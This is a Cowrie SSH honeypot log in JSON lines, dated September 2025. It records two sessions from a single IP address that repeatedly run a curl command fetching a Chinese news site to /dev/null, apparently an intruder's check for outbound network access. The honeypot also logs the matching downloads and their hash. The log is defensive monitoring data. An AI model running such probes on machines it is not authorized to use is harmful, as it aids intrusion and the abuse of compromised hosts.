{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.905076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.906204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.919526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.920575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.946800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.948205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.962587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.963771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.989452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.990654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.007153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.008112Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.011293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.019503Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.028398Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.035351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.036378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.051955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.053010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.063156Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.072135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.073049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.099958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.101150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.117480Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.118493Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.141587Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.142743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.153542Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.154819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.155970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.179390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.180784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.191239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.192251Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.229951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.231330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.236452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.237571Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.274149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.275965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.277956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.280369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.304801Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.315814Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.320133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.321058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.323540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.324484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.366473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.367952Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.371387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.372253Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.411144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.412370Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.415048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.415918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.459969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.461118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.464326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.465656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.502085Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.503733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.504750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.510631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.511581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.539490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.540799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.548059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.548994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.577001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.578124Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.584126Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.586393Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.587463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.622416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.623488Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.626199Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.632252Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.633162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.660537Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.661656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.671876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.672898Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.695619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.696675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.708844Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.709818Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.730535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.731495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.739452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.740697Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.743531Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.748409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.749328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.768014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.769444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.787480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.788558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.805133Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.815320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.816340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.842119Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.843428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.844309Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
